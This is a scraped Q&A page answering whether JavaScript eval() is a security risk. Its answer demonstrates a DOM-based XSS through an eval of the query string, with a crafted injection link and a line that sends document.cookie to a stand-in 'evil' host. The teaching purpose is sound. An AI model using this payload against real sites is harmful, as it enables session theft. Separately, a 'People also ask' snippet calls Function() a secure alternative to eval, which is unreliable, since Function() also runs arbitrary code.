Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

javascript eval() and security

developer.mozilla.org says:

Don't use eval needlessly! eval() is a dangerous function, which executes the code it's passed with the privileges of the caller.

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

Any malicious user can turn on chrome debugger for example, and modify javascript code that is being executed. So he can put his own functions to be executed etc.

Is there such thing as "secure javascript code" in general?

like image 859
Jaunius Eitmantis Avatar asked Aug 20 '16 20:08

Jaunius Eitmantis


People also ask

Is it safe to use eval in JavaScript?

Executing JavaScript from a string is an BIG security risk. With eval(), malicious code can run inside your application without permission. With eval(), third-party code can see the scope of your application, which can lead to possible attacks.

Is eval a security risk?

Eval() in JavaScript Security RisksThis risk comes primarily from the function's use to evaluate user input. If a savvy user comes across a text field on your site that is running eval(), they could use it to execute malicious code.

What is a safe alternative to using eval ()?

An alternative to eval is Function() . Just like eval() , Function() takes some expression as a string for execution, except, rather than outputting the result directly, it returns an anonymous function to you that you can call. `Function() is a faster and more secure alternative to eval().

Is eval deprecated?

Question : The 'eval' method within JavaScript / DemandwareScript is deprecated based on the potential security risks by using this method as it doesn't escape input parameters. Answer : You should use the 'new Function()' instead.


1 Answers

Any malicious user can turn on chrome debugger for example, and modify javascript code that is being executed. So he can put his own functions to be executed etc.

Yes, a user can "attack" their own client-side session using JavaScript by using developer tools.

However, the difference between eval and developer tools is that eval may execute things in shareable links. The attacker could send their victim a link, which exploits the code evaluation function.

Take this code:

<script>

eval('alert("Your query string was ' + unescape(document.location.search) + '");');

</script>

Now if the query string is ?foo you simply get an alert dialog stating the following: Your query string was ?foo

Now say Chuck sends Bob an email with the subject "Look at this great link!".

The link is constructed as follows:

http://www.example.com/page.htm?hello%22);alert(document.cookie+%22, where www.example.com is your website.

This modifies the code that is executed by eval() to

alert("Your query string was hello");
alert(document.cookie+"");

(New lines added by me for clarity). This will show an alert box displaying all the non httpOnly cookies.

Take this to the next stage and the attacker could construct an image link to send the session cookie to themselves

new Image().src="https://evil.example.org/?cookie=" + escape(document.cookie)

This is known as a Cross-Site Scripting (XSS) attack. In fact, the type is a DOM based XSS, to be specific.

Is there such thing as "secure javascript code" in general?

Yes, code that's secure against XSS could be considered "secure JavaScript code" - it protects the current user from cross-domain attacks. However, server-side code that "trusts" that the current end-user won't modify JavaScript code or variables to their own advantage using developer tools though isn't secure.

Therefore secure JavaScript code is such code that will protect the current user only.

like image 64
SilverlightFox Avatar answered Oct 01 '22 16:10

SilverlightFox